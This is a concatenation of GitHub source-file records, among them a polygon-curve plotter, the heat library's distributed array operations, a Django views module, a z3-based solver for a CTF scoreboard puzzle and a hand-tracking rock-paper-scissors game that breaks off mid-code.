+{"seq_id":"9094052529","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom cmath import polar, rect\n\ndef cal_dist(point):\n return sum([p**2 for p in point])\n\nclass ParamPoly2D:\n def __init__(self,r ,n):\n '''\n '''\n self.r = r\n self.n = n\n self.root_coor, self.curve = self.generate_curve()\n self.plotting = False\n\n def generate_curve(self):\n '''\n '''\n self.diff_angle = 2 * np.pi/ self.n\n self.init_phasor = rect(self.r,0)\n roots = [ (self.r, i*self.diff_angle) for i in range(self.n) ]\n self.edge = 2*self.r*np.sin(self.diff_angle/2)\n ds = 0.05/self.edge\n self.s = np.arange(0,self.n,ds)\n x, y = [], []\n for i_s in self.s:\n i = np.floor(i_s)\n tau = i_s - i\n point = self.r*rect(1,self.diff_angle*i)*((1-tau) + tau*rect(1,self.diff_angle))\n x.append(point.real)\n y.append(point.imag) \n root_coors = [rect(*root).real for root in roots ],[rect(*root).imag for root in roots ]\n \n return root_coors, (x,y)\n \n def plot(self,x,y,points=True):\n '''\n '''\n plt.plot(x,y, \"xb\" if points else \"-r\", label=\"input\")\n plt.grid(True)\n plt.axis(\"equal\")\n plt.xlabel(\"x[m]\")\n plt.ylabel(\"y[m]\")\n plt.legend()\n self.plotting = True\n\n def __call__(self, r, n):\n '''\n '''\n self.__init__(r,n)\n return self\n\n def sample(self, point, dist, cen_point=[0, 0]):\n '''\n '''\n relative_dist = sorted([root for root in zip(*self.root_coor)], key=lambda x: (x[0]-point[0])**2+(x[1]-point[1])**2 )\n \n root_1 = relative_dist[0]\n root_2 = relative_dist[0]\n poly_edge = [ root_1[i]-root_2[i] for i in range(2) ]\n cen_loc = [ cen_point[i]-point[i] for i in range(2) ]\n a = np.array(\n [\n [ poly_edge[0], cen_loc[0] ],\n [ poly_edge[1], cen_loc[1] ]\n ])\n b = np.array([\n cen_loc[0]-root_1[0], cen_loc[1]-root_1[0]\n ])\n ratio = np.linalg.solve(a, b)\n sol = [ (ratio[0]*poly_edge[i]) + root_1[i] for i in range(2) ]\n\n delta = np.sqrt(sum([ (root_1[i] - sol[i])**2 for i in range(2)]))\n curl = np.cross( [sol[i]-root_1[i] for i in range(2)], root_1)\n if curl>=0:\n dist += delta\n else:\n dist -= delta \n \n root_ind = list(zip(*self.root_coor)).index(root_1)\n\n if dist>=0:\n i = (dist)//cal_dist(poly_edge)\n root_ind += i\n dist %= cal_dist(poly_edge)\n else:\n i = (-dist)//cal_dist(poly_edge)\n root_ind -= i\n dist = - ( (-dist)%cal_dist(poly_edge))\n final_point = [self.root_coor[0][root_ind%n], self.root_coor[1][root_ind%n]]\n lmd = 0\n if dist>=0:\n lmd = abs(dist)/cal_dist(poly_edge)\n nxt_point = [self.root_coor[0][(root_ind+1)%n], self.root_coor[1][(root_ind+1)%n]]\n poly_edge = [nxt_point[i]-final_point[i] for i in range(2)]\n else:\n lmd = abs(dist)/cal_dist(poly_edge)\n nxt_point = [self.root_coor[0][(root_ind-1)%n], self.root_coor[1][(root_ind-1)%n]]\n poly_edge = [nxt_point[i]-final_point[i] for i in range(2)]\n \n sampled_point = [(lmd*poly_edge[i]) + final_point[i] for i in range(2)]\n\n return sampled_point\n\n def sample_near(self, point):\n best_point = min([root for root in zip(*self.root_coor)], key=lambda x: (x[0]-point[0])**2+(x[1]-point[1])**2 )\n if self.plotting: \n plt.plot(*best_point,\"xg\")\n return best_point\n\n def lookup(self, obs_point, cen_point):\n '''\n For the given input point returns features of the polygon\n '''\n point = [obs_point[i] - cen_point[i] for i in range(2)]\n obs2cen = [cen_point[i] - obs_point[i] for i in range(2)]\n vec = [self.n, self.r, *self.sample_near(point), *obs2cen]\n\nif __name__ == \"__main__\":\n polygon = ParamPoly2D(50,9)\n plt.subplots(1)\n polygon.plot(*polygon.root_coor, points=True)\n 
polygon.plot(*polygon.curve, points=False)\n #polygon.sample_near((1,2))\n #polygon = polygon(5,3)\n #polygon.plot(*polygon.root_coor, points=True)\n #polygon.plot(*polygon.curve, points=False)\n plt.show()\n","repo_name":"Robotics-Club-IIT-BHU/ModularBot_Planner","sub_path":"coordination/parametric_curve.py","file_name":"parametric_curve.py","file_ext":"py","file_size_in_byte":4401,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
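A hedged reading of two bugs in sample() above: root_2 repeats relative_dist[0], making poly_edge the zero vector, and the second component of b reuses root_1[0] where root_1[1] is clearly meant (sample also reads the global n instead of self.n). A self-contained sketch of the intended edge/intersection system, with the two nearest vertices passed explicitly:

import numpy as np

def edge_system(point, cen_point, root_1, root_2):
    # Solve for where the ray from point toward cen_point meets the
    # polygon edge from root_1 to root_2.
    poly_edge = [root_2[i] - root_1[i] for i in range(2)]
    cen_loc = [cen_point[i] - point[i] for i in range(2)]
    a = np.array([[poly_edge[0], cen_loc[0]],
                  [poly_edge[1], cen_loc[1]]])
    b = np.array([cen_loc[0] - root_1[0], cen_loc[1] - root_1[1]])
    return np.linalg.solve(a, b)  # [edge ratio, center-ray ratio]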
+{"seq_id":"70322023591","text":"#!/usr/bin/env python\n\n\nimport confu\nparser = confu.standard_parser(\"clog configuration script\")\n\n\ndef main(args):\n options = parser.parse_args(args)\n build = confu.Build.from_options(options)\n\n build.export_cpath(\"include\", [\"clog.h\"])\n\n with build.options(source_dir=\"src\", extra_include_dirs=\"src\"):\n build.static_library(\"clog\", build.cc(\"clog.c\"))\n\n with build.options(source_dir=\"test\", deps={\n (build, build.deps.googletest): all,\n \"log\": build.target.is_android}):\n build.unittest(\"clog-test\", build.cxx(\"clog.cc\"))\n\n return build\n\nif __name__ == \"__main__\":\n import sys\n main(sys.argv[1:]).generate()\n","repo_name":"pytorch/cpuinfo","sub_path":"deps/clog/configure.py","file_name":"configure.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":866,"dataset":"github-code","pt":"71"}
+{"seq_id":"36216173988","text":"numset = { int(line) for line in open(\"sum.txt\") }\n\ntarget_range = range(-10000, 10000 + 1) # Inclusive\ntargetset = set()\n\nprint(\"Initialized!\")\n\ndivisor_dict = {}\ndivisor = max(target_range) - min(target_range)\nfor a in numset:\n divisor_index = int( a / divisor )\n if divisor_index in divisor_dict:\n divisor_dict[divisor_index].append(a)\n else:\n divisor_dict[divisor_index] = [a]\n\nprint(\"Formed dict!\")\n\nmember_set = set()\nfor a in numset:\n if a in member_set: pass\n targetlist = []\n divisor_index = int( ( min(target_range) - a ) / divisor )\n for index in range(divisor_index - 1, divisor_index + 2): # Check [divisor_index - 1, divisor_index +1]\n if index in divisor_dict:\n targetlist.extend(divisor_dict[index])\n # print(\"targetlist: {}\".format(targetlist))\n for b in targetlist:\n if a + b in target_range:\n # print(\"FOUND!!! {} + {} = {}\".format(a,b,a+b))\n targetset.add( a + b )\n member_set.add(a) ## Already sent a, which should only be found once\n member_set.add(b)\n\nprint(len(targetset))\nprint('\\a')\n","repo_name":"timeemit/algorithms","sub_path":"6/sum.py","file_name":"sum.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"29912403872","text":"import matplotlib\nmatplotlib.use('Agg')\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom .models import Registration\nfrom .forms import RegistrationForm\nfrom django.http import HttpResponseRedirect\nimport matplotlib.pyplot as plt\nimport pandas as pd\n#import mysql.connector as sql\nfrom urllib.parse import quote\nfrom sqlalchemy import create_engine\nfrom .serializers import RegistrationSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom django.db.models import Q\nfrom datetime import date,timedelta\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom django.http import HttpResponse\nfrom rest_framework.authtoken.views import ObtainAuthToken\n\n\nengine = create_engine(\n 'sqlite:///db.sqlite3',\n )\n\n#db_connection = sql.connect(host='localhost', database='sds_db', user='adarsh', password='Dbpass@1')\n\n#db_cursor = db_connection.cursor()\n\n# [model -> view]Create your views here.what needs to be shown in webpage\n\n'''def count_rows():\n #query=pd.read_sql('select * from main_registration',con=engine)\n #df=pd.DataFrame(query)\n #total = df['id'].count()\n total=Registration.objects.all().count()\n return total'''\n\ndef home(request):\n #sitename = 'SHARMA DRIVING SCHOOL'\n #registerdata = Registration.objects.raw('select id,address from main_registration')\n #data = {\n # 'registerdata':registerdata\n #}\n total=Registration.objects.all().count()\n chart = pd.read_sql('select count(address) as count,address from main_registration group by address',con=engine)\n df = pd.DataFrame(chart)\n X = list(df.iloc[:,1])\n Y = list(df.iloc[:,0])\n plt.bar(X,Y, color=['orange', 'red', 'green', 'blue', 'cyan', 'yellow'])\n plt.xlabel(\"Areas covered\")\n plt.ylabel(\"No. 
of counts\")\n plt.savefig('./main/static/img/foo.png',dpi=300,) \n \n return render(request, 'front/home.html',{'total':total})\n\ndef about(request):\n\n return render(request, 'front/about.html')\n\ndef contact(request):\n\n return render(request, 'front/contact.html')\n\ndef register(request):\n \n submitted = False\n if request.method == \"POST\":\n form = RegistrationForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect('/register?submitted=True')\n else:\n form = RegistrationForm\n if 'submitted' in request.GET:\n submitted = True\n return render(request, 'front/register.html',{'form':form,'submitted':submitted})\n\ndef certificate(request):\n ref=date.today()-timedelta(days=15)\n if request.method == 'GET':\n query= request.GET.get('q')\n\n submitbutton= request.GET.get('submit')\n \n if query is not None:\n #lookups= Q(name__icontains=query) | Q(address__icontains=query)\n lookups= Q(date__icontains=query)\n results= Registration.objects.filter(lookups).distinct()\n\n context={'results': results,\n 'submitbutton': submitbutton}\n #print(\"ref\",ref)\n return render(request, 'front/certificate.html', context)\n\n else:\n new_date={\"ref\":str(ref)}\n print(\"ref\",ref)\n return render(request, 'front/certificate.html',new_date)\n\n else:\n #print(\"ref\",ref)\n return render(request, 'front/certificate.html',{'ref':ref})\n #return render(request, 'front/certificate.html')\n\n@api_view(['GET','POST'])\ndef Registration_list(request):\n if request.method == 'GET':\n register=Registration.objects.all()\n serializer=RegistrationSerializer(register,many=True)\n return Response(serializer.data)\n \n if request.method == 'POST':\n serializer=RegistrationSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data,status=status.HTTP_201_CREATED)\n\n\n\n\n \n\n\n","repo_name":"first-second/sds","sub_path":"myproject/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"40307268554","text":"import builtins\nimport numpy as np\nimport torch\nimport warnings\n\nfrom .communication import MPI, MPI_WORLD\nfrom . import factories\nfrom . import devices\nfrom . import stride_tricks\nfrom . import sanitation\nfrom . import statistics\nfrom . import dndarray\nfrom . import types\n\n__all__ = []\n__BOOLEAN_OPS = [MPI.LAND, MPI.LOR, MPI.BAND, MPI.BOR]\n\n\ndef __binary_op(operation, t1, t2, out=None):\n \"\"\"\n Generic wrapper for element-wise binary operations of two operands (either can be tensor or scalar).\n Takes the operation function and the two operands involved in the operation as arguments.\n\n Parameters\n ----------\n operation : function\n The operation to be performed. Function that performs operation elements-wise on the involved tensors,\n e.g. add values from other to self\n\n t1: dndarray or scalar\n The first operand involved in the operation,\n\n t2: dndarray or scalar\n The second operand involved in the operation,\n\n Returns\n -------\n result: ht.DNDarray\n A DNDarray containing the results of element-wise operation.\n \"\"\"\n if np.isscalar(t1):\n try:\n t1 = factories.array(\n [t1], device=t2.device if isinstance(t2, dndarray.DNDarray) else None\n )\n except (ValueError, TypeError):\n raise TypeError(\"Data type not supported, input was {}\".format(type(t1)))\n\n if np.isscalar(t2):\n try:\n t2 = factories.array([t2])\n except (ValueError, TypeError):\n raise TypeError(\n \"Only numeric scalars are supported, but input was {}\".format(type(t2))\n )\n output_shape = (1,)\n output_split = None\n output_device = t2.device\n output_comm = MPI_WORLD\n elif isinstance(t2, dndarray.DNDarray):\n output_shape = t2.shape\n output_split = t2.split\n output_device = t2.device\n output_comm = t2.comm\n else:\n raise TypeError(\n \"Only tensors and numeric scalars are supported, but input was {}\".format(type(t2))\n )\n\n if t1.dtype != t2.dtype:\n t1 = t1.astype(t2.dtype)\n\n elif isinstance(t1, dndarray.DNDarray):\n if np.isscalar(t2):\n try:\n t2 = factories.array([t2], device=t1.device)\n output_shape = t1.shape\n output_split = t1.split\n output_device = t1.device\n output_comm = t1.comm\n except (ValueError, TypeError):\n raise TypeError(\"Data type not supported, input was {}\".format(type(t2)))\n\n elif isinstance(t2, dndarray.DNDarray):\n if t1.split is None:\n t1 = factories.array(\n t1, split=t2.split, copy=False, comm=t1.comm, device=t1.device, ndmin=-t2.ndim\n )\n elif t2.split is None:\n t2 = factories.array(\n t2, split=t1.split, copy=False, comm=t2.comm, device=t2.device, ndmin=-t1.ndim\n )\n elif t1.split != t2.split:\n # It is NOT possible to perform binary operations on tensors with different splits, e.g. split=0\n # and split=1\n raise NotImplementedError(\"Not implemented for other splittings\")\n\n output_shape = stride_tricks.broadcast_shape(t1.shape, t2.shape)\n output_split = t1.split\n output_device = t1.device\n output_comm = t1.comm\n\n # ToDo: Fine tuning in case of comm.size>t1.shape[t1.split]. 
Send torch tensors only to ranks, that will hold data.\n if t1.split is not None:\n if t1.shape[t1.split] == 1 and t1.comm.is_distributed():\n warnings.warn(\n \"Broadcasting requires transferring data of first operator between MPI ranks!\"\n )\n if t1.comm.rank > 0:\n t1.larray = torch.zeros(\n t1.shape, dtype=t1.dtype.torch_type(), device=t1.device.torch_device\n )\n t1.comm.Bcast(t1)\n\n if t2.split is not None:\n if t2.shape[t2.split] == 1 and t2.comm.is_distributed():\n warnings.warn(\n \"Broadcasting requires transferring data of second operator between MPI ranks!\"\n )\n if t2.comm.rank > 0:\n t2.larray = torch.zeros(\n t2.shape, dtype=t2.dtype.torch_type(), device=t2.device.torch_device\n )\n t2.comm.Bcast(t2)\n\n else:\n raise TypeError(\n \"Only tensors and numeric scalars are supported, but input was {}\".format(type(t2))\n )\n else:\n raise NotImplementedError(\"Not implemented for non scalar\")\n\n # sanitize output\n if out is not None:\n sanitation.sanitize_out(out, output_shape, output_split, output_device)\n\n promoted_type = types.promote_types(t1.dtype, t2.dtype).torch_type()\n if t1.split is not None:\n if len(t1.lshape) > t1.split and t1.lshape[t1.split] == 0:\n result = t1.larray.type(promoted_type)\n else:\n result = operation(t1.larray.type(promoted_type), t2.larray.type(promoted_type))\n elif t2.split is not None:\n\n if len(t2.lshape) > t2.split and t2.lshape[t2.split] == 0:\n result = t2.larray.type(promoted_type)\n else:\n result = operation(t1.larray.type(promoted_type), t2.larray.type(promoted_type))\n else:\n result = operation(t1.larray.type(promoted_type), t2.larray.type(promoted_type))\n\n if not isinstance(result, torch.Tensor):\n result = torch.tensor(result, device=output_device.torch_device)\n\n if out is not None:\n out_dtype = out.dtype\n out.larray = result\n out._DNDarray__comm = output_comm\n out = out.astype(out_dtype)\n return out\n\n return dndarray.DNDarray(\n result,\n output_shape,\n types.heat_type_of(result),\n output_split,\n output_device,\n output_comm,\n balanced=None,\n )\n\n\ndef __cum_op(x, partial_op, exscan_op, final_op, neutral, axis, dtype, out):\n \"\"\"\n Generic wrapper for cumulative operations, i.e. cumsum(), cumprod(). Performs a three-stage cumulative operation. First, a partial\n cumulative operation is performed node-local that is combined into a global cumulative result via an MPI_Op and a final local\n reduction add or mul operation.\n\n Parameters\n ----------\n x : ht.DNDarray\n The heat DNDarray on which to perform the cumulative operation\n partial_op: function\n The function performing a partial cumulative operation on the process-local data portion, e.g. cumsum().\n exscan_op: mpi4py.MPI.Op\n The MPI operator for performing the exscan based on the results returned by the partial_op function.\n final_op: function\n The local operation for the final result, e.g. add() for cumsum().\n neutral: scalar\n Neutral element for the cumulative operation, i.e. 
an element that does not change the reductions operations\n result.\n axis: int\n The axis direction of the cumulative operation\n dtype: ht.type\n The type of the result tensor.\n out: ht.DNDarray\n The explicitly returned output tensor.\n\n Returns\n -------\n result: ht.DNDarray\n A DNDarray containing the result of the reduction operation\n\n Raises\n ------\n TypeError\n If the input or optional output parameter are not of type ht.DNDarray\n ValueError\n If the shape of the optional output parameters does not match the shape of the input\n NotImplementedError\n Numpy's behaviour of axis is None is not supported as of now\n RuntimeError\n If the split or device parameters do not match the parameters of the input\n \"\"\"\n # perform sanitation\n sanitation.sanitize_in(x)\n\n if axis is None:\n raise NotImplementedError(\"axis = None is not supported\")\n axis = stride_tricks.sanitize_axis(x.shape, axis)\n\n if dtype is not None:\n dtype = types.canonical_heat_type(dtype)\n\n if out is not None:\n sanitation.sanitize_out(out, x.shape, x.split, x.device)\n dtype = out.dtype\n\n cumop = partial_op(\n x.larray,\n axis,\n out=None if out is None else out.larray,\n dtype=None if dtype is None else dtype.torch_type(),\n )\n\n if x.split is not None and axis == x.split:\n indices = torch.tensor([cumop.shape[axis] - 1], device=cumop.device)\n send = (\n torch.index_select(cumop, axis, indices)\n if indices[0] >= 0\n else torch.full(\n cumop.shape[:axis] + torch.Size([1]) + cumop.shape[axis + 1 :],\n neutral,\n dtype=cumop.dtype,\n device=cumop.device,\n )\n )\n recv = torch.full(\n cumop.shape[:axis] + torch.Size([1]) + cumop.shape[axis + 1 :],\n neutral,\n dtype=cumop.dtype,\n device=cumop.device,\n )\n\n x.comm.Exscan(send, recv, exscan_op)\n final_op(cumop, recv, out=cumop)\n\n if out is not None:\n return out\n\n return factories.array(\n cumop, dtype=x.dtype if dtype is None else dtype, is_split=x.split, device=x.device\n )\n\n\ndef __local_op(operation, x, out, no_cast=False, **kwargs):\n \"\"\"\n Generic wrapper for local operations, which do not require communication. Accepts the actual operation function as\n argument and takes only care of buffer allocation/writing. This function is intended to work on an element-wise bases\n WARNING: the gshape of the result will be the same as x\n\n Parameters\n ----------\n operation : function\n A function implementing the element-wise local operation, e.g. torch.sqrt\n x : ht.DNDarray\n The value for which to compute 'operation'.\n no_cast : bool\n Flag to avoid casting to floats\n out : ht.DNDarray or None\n A location in which to store the results. If provided, it must have a broadcastable shape. If not provided or\n set to None, a fresh tensor is allocated.\n\n Returns\n -------\n result : ht.DNDarray\n A tensor of the same shape as x, containing the result of 'operation' for each element in x. 
If out was\n provided, result is a reference to it.\n\n Raises\n -------\n TypeError\n If the input is not a tensor or the output is not a tensor or None.\n \"\"\"\n # perform sanitation\n sanitation.sanitize_in(x)\n if out is not None and not isinstance(out, dndarray.DNDarray):\n raise TypeError(\"expected out to be None or an ht.DNDarray, but was {}\".format(type(out)))\n\n # infer the output type of the tensor\n # we need floating point numbers here, due to PyTorch only providing sqrt() implementation for float32/64\n if not no_cast:\n promoted_type = types.promote_types(x.dtype, types.float32)\n torch_type = promoted_type.torch_type()\n else:\n torch_type = x.larray.dtype\n\n # no defined output tensor, return a freshly created one\n if out is None:\n result = operation(x.larray.type(torch_type), **kwargs)\n return dndarray.DNDarray(\n result,\n x.gshape,\n types.canonical_heat_type(result.dtype),\n x.split,\n x.device,\n x.comm,\n x.balanced,\n )\n\n # output buffer writing requires a bit more work\n # we need to determine whether the operands are broadcastable and the multiple of the broadcasting\n # reason: manually repetition for each dimension as PyTorch does not conform to numpy's broadcast semantic\n # PyTorch always recreates the input shape and ignores broadcasting for too large buffers\n broadcast_shape = stride_tricks.broadcast_shape(x.lshape, out.lshape)\n padded_shape = (1,) * (len(broadcast_shape) - len(x.lshape)) + x.lshape\n multiples = [int(a / b) for a, b in zip(broadcast_shape, padded_shape)]\n needs_repetition = builtins.any(multiple > 1 for multiple in multiples)\n\n # do an inplace operation into a provided buffer\n casted = x.larray.type(torch_type)\n operation(casted.repeat(multiples) if needs_repetition else casted, out=out.larray, **kwargs)\n\n return out\n\n\ndef __reduce_op(x, partial_op, reduction_op, neutral=None, **kwargs):\n \"\"\"\n Generic wrapper for reduction operations, e.g. sum(), prod() etc. Performs a two-stage reduction. First, a partial\n reduction is performed node-local that is combined into a global reduction result via an MPI_Op.\n\n Parameters\n ----------\n x : ht.DNDarray\n The heat DNDarray on which to perform the reduction operation\n\n partial_op: function\n The function performing a partial reduction on the process-local data portion, e.g. sum() for implementing a\n distributed mean() operation.\n\n reduction_op: mpi4py.MPI.Op\n The MPI operator for performing the full reduction based on the results returned by the partial_op function.\n\n neutral: scalar\n Neutral element, i.e. an element that does not change the result of the reduction operation. 
Needed for\n those cases where 'x.gshape[x.split] < x.comm.rank', that is, the shape of the distributed tensor is such\n that one or more processes will be left without data.\n\n Returns\n -------\n result: ht.DNDarray\n A DNDarray containing the result of the reduction operation\n\n Raises\n ------\n TypeError\n If the input or optional output parameter are not of type ht.DNDarray\n ValueError\n If the shape of the optional output parameters does not match the shape of the reduced result\n \"\"\"\n # perform sanitation\n sanitation.sanitize_in(x)\n\n # no further checking needed, sanitize axis will raise the proper exceptions\n axis = stride_tricks.sanitize_axis(x.shape, kwargs.get(\"axis\"))\n if isinstance(axis, int):\n axis = (axis,)\n keepdim = kwargs.get(\"keepdim\")\n out = kwargs.get(\"out\")\n split = x.split\n balanced = x.balanced\n\n # if local tensor is empty, replace it with the identity element\n if 0 in x.lshape and (axis is None or (x.split in axis)):\n if neutral is None:\n neutral = float(\"nan\")\n neutral_shape = x.gshape[:split] + (1,) + x.gshape[split + 1 :]\n partial = torch.full(\n neutral_shape,\n fill_value=neutral,\n dtype=x.dtype.torch_type(),\n device=x.device.torch_device,\n )\n else:\n partial = x.larray\n\n # apply the partial reduction operation to the local tensor\n if axis is None:\n partial = partial_op(partial).reshape(-1)\n output_shape = (1,)\n balanced = True\n else:\n output_shape = x.gshape\n for dim in axis:\n partial = partial_op(partial, dim=dim, keepdim=True)\n output_shape = output_shape[:dim] + (1,) + output_shape[dim + 1 :]\n if not keepdim and not len(partial.shape) == 1:\n gshape_losedim = tuple(x.gshape[dim] for dim in range(len(x.gshape)) if dim not in axis)\n lshape_losedim = tuple(x.lshape[dim] for dim in range(len(x.lshape)) if dim not in axis)\n output_shape = gshape_losedim\n # Take care of special cases argmin and argmax: keep partial.shape[0]\n if 0 in axis and partial.shape[0] != 1:\n lshape_losedim = (partial.shape[0],) + lshape_losedim\n if 0 not in axis and partial.shape[0] != x.lshape[0]:\n lshape_losedim = (partial.shape[0],) + lshape_losedim[1:]\n if len(lshape_losedim) > 0:\n partial = partial.reshape(lshape_losedim)\n # perform a reduction operation in case the tensor is distributed across the reduction axis\n if x.split is not None and (axis is None or (x.split in axis)):\n split = None\n balanced = True\n if x.comm.is_distributed():\n x.comm.Allreduce(MPI.IN_PLACE, partial, reduction_op)\n\n ARG_OPS = [statistics.MPI_ARGMAX, statistics.MPI_ARGMIN]\n arg_op = False\n if reduction_op in ARG_OPS:\n arg_op = True\n partial = partial.chunk(2)[-1].type(torch.int64)\n if partial.ndim > 1:\n partial = partial.squeeze(dim=0)\n\n # if reduction_op is a Boolean operation, then resulting tensor is bool\n tensor_type = bool if reduction_op in __BOOLEAN_OPS else partial.dtype\n\n if out is not None:\n # sanitize out\n sanitation.sanitize_out(out, output_shape, split, x.device)\n if arg_op and out.dtype != types.canonical_heat_type(partial.dtype):\n raise TypeError(\n \"Data type mismatch: out.dtype should be {}, is {}\".format(\n types.canonical_heat_type(partial.dtype), out.dtype\n )\n )\n out._DNDarray__array = partial\n return out\n\n return dndarray.DNDarray(\n partial,\n output_shape,\n types.canonical_heat_type(tensor_type),\n split=split,\n device=x.device,\n comm=x.comm,\n balanced=balanced,\n 
)\n","repo_name":"coquelin77/icml-repo","sub_path":"heat/core/_operations.py","file_name":"_operations.py","file_ext":"py","file_size_in_byte":17304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"21479374916","text":"import pytorch_lightning as pl\n\nclass PyLoggerCallback(pl.callbacks.Callback):\n\tdef __init__(self, logger, **kwargs):\n\t\tsuper(PyLoggerCallback, self).__init__(**kwargs)\n\t\tself.logger = logger\n\n\tdef on_epoch_start(self, trainer, pl_module):\n\t\tmsg = 'Processing Epoch {}'.format(trainer.current_epoch+1)\n\t\tself.logger.info(msg)\n\n\tdef on_epoch_end(self, trainer, pl_module):\n\t\tmsg = 'Epoch {} - Train Loss: {:.6f}, Val Loss: {:.6f}, Val Score: {:.6f}'.format(\n\t\t\ttrainer.current_epoch+1,\n\t\t\tpl_module.stat['train']['loss'][-1],\n\t\t\tpl_module.stat['validation']['loss'][-1],\n\t\t\tpl_module.stat['validation']['jaccard_score'][-1]\n\t\t)\n\t\tself.logger.info(msg)","repo_name":"ywu94/Code-Notes","sub_path":"HuggingFace-TSE/callback.py","file_name":"callback.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"35434134587","text":"from bs4 import BeautifulSoup\r\nimport requests\r\nfrom z3 import *\r\n\r\nBASE_URL = 'http://175.118.127.123:5000'\r\n\r\nteams = '''zer0cats\r\nCheckTheSign\r\nC4T BuT M3W\r\nidk\r\nkalmaronion\r\nHikeBoy\r\njustCatchTheFish\r\nr3kabunny\r\nSNSD\r\norgani-cats\r\nthequackerscrew\r\n1daysober\r\nMore Fried Elite Duck\r\nBlack Butterflies\r\nProject Sakura\r\nQQQ\r\nShyKOR\r\nGoose N\r\nMINUS\r\nBalsamic Vinegar\r\nNever Stop Exploding\r\nDiceDang\r\nThe Round Network Society\r\n796e74\r\nThe Moose\r\nUpper Guesser\r\nHackingForBeer\r\nWaffle Bacon\r\nChordBlue\r\nmhackaroni\r\nWatermelon Paddler\r\nPerfect Pink\r\nKatzekatbin\r\nThe Quack\r\nShellfish\r\nDragon Sushi\r\nEmu Eggs Benny\r\nYGY\r\nOsakaWesterns\r\nPolygroot\r\nDragon Vector\r\nLCDC\r\n127\r\nEat, Sleep, Misc, Repeat\r\nNu0L\r\no0ps\r\nBubble Tea Deliverers\r\nDashwhackers\r\nA*C*E\r\nCloseToAll\r\nDeficit\r\nsquareimentary\r\ndaejeonelectricdecomposer\r\nnone2root\r\nInverselab\r\nEver Stop Exploiting\r\ncopyn\r\nSunBugs\r\nFBISEC\r\ndefined\r\nNEWSEC'''.split('\\n')\r\n\r\ndef parse_challenges(teamname):\r\n url = BASE_URL + '/team/' + teamname\r\n response = requests.get(url)\r\n soup = BeautifulSoup(response.text, 'html.parser')\r\n\r\n li_tags = soup.find_all('li')\r\n challs = []\r\n for li in li_tags:\r\n if li.text:\r\n challs.append(li.text)\r\n return challs\r\n\r\n\r\ndef get_rank_list():\r\n url = BASE_URL + '/scoreboard_requested'\r\n response = requests.get(url)\r\n soup = BeautifulSoup(response.text, 'html.parser')\r\n\r\n li_tags = soup.find_all('li')\r\n ranks = []\r\n for li in li_tags:\r\n if li.text:\r\n ranks.append(li.text)\r\n return ranks\r\n\r\n\r\ndef find_solution():\r\n vars = [Int(f'var{i}') for i in range(len(teams))]\r\n eqs = []\r\n for team in ranks:\r\n eq = 0\r\n for chal in team_solved[team]:\r\n eq += vars[occur[chal]-1]\r\n eqs.append(eq)\r\n \r\n z = Solver()\r\n z.add(vars[-1] > 0)\r\n z.add(vars[0] < 10**9)\r\n for i in range(len(teams)-1):\r\n z.add(eqs[i] > eqs[i+1])\r\n z.add(vars[i] > vars[i+1])\r\n \r\n if z.check() == sat:\r\n model = z.model()\r\n ret = []\r\n for var in vars:\r\n ret.append(model[var].as_long())\r\n print(ret)\r\n \r\n else:\r\n print(\"unsat\")\r\n exit(-1)\r\n\r\n return ret\r\n\r\ndef send_query(sol):\r\n url = BASE_URL + '/check'\r\n data = {}\r\n for i in range(len(teams)):\r\n data[f\"input{i+1}\"] = str(sol[i])\r\n \r\n resp = requests.post(url, data=data)\r\n t = resp.text\r\n if \"WACON\" not in t:\r\n print(\"nono..\")\r\n else:\r\n i1 = t.find(\"WACON\")\r\n i2 = t.find(\"}\")\r\n print(t[i1:i2+1])\r\n\r\nteam_solved = {}\r\noccur = {}\r\n\r\nfor team in teams:\r\n team_solved[team] = parse_challenges(team)\r\n for chal in team_solved[team]:\r\n if chal not in occur:\r\n occur[chal] = 0\r\n occur[chal] += 1\r\n\r\nranks = get_rank_list()\r\n#print(ranks)\r\n#exit()\r\n\r\nprint(\"Parse done\")\r\n\r\nprint(\"z3 gogo\")\r\nsol = find_solution()\r\nsend_query(sol)\r\n","repo_name":"encrypted-def/my-ctf-challenges","sub_path":"2023/WACON Quals/[misc] let-me-win/solution/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"}
+{"seq_id":"2396641351","text":"import cv2\r\nimport cvzone\r\nfrom cvzone.HandTrackingModule import HandDetector\r\nimport time\r\nimport numpy as np\r\n\r\ncap = cv2.VideoCapture(0)\r\ncap.set(3,640)\r\ncap.set(4,480)\r\ndetector = HandDetector(maxHands=1)\r\ntimer = 0\r\nstateResult = False\r\nstartGame =False\r\nscores = [0,0] #[ai,player]\r\n\r\n\r\n\r\n\r\nwhile True:\r\n imgBG = cv2.imread(\"Resources\\BG.png\")\r\n success, img = cap.read()\r\n imgscaled = cv2.resize(img,(0,0),None,0.875,0.875)\r\n #Cropping the image to fit properly in the bg template\r\n imgscaled = imgscaled[:,80:480] #first slice value is height and second one is width\r\n\r\n # Findhands\r\n hands, img = detector.findHands(imgscaled)\r\n\r\n if startGame:\r\n if stateResult is False:\r\n timer = time.time() - initialTime\r\n cv2.putText(imgBG, str(int(timer)), (605, 435), cv2.FONT_HERSHEY_PLAIN, 6, (255, 0, 255), 4)\r\n\r\n if timer >3:\r\n stateResult = True\r\n timer = 0\r\n if hands:\r\n playerMove = None\r\n hand = hands[0]\r\n fingers = detector.fingersUp(hand)\r\n if fingers == [0, 0, 0, 0, 0]:\r\n playerMove = 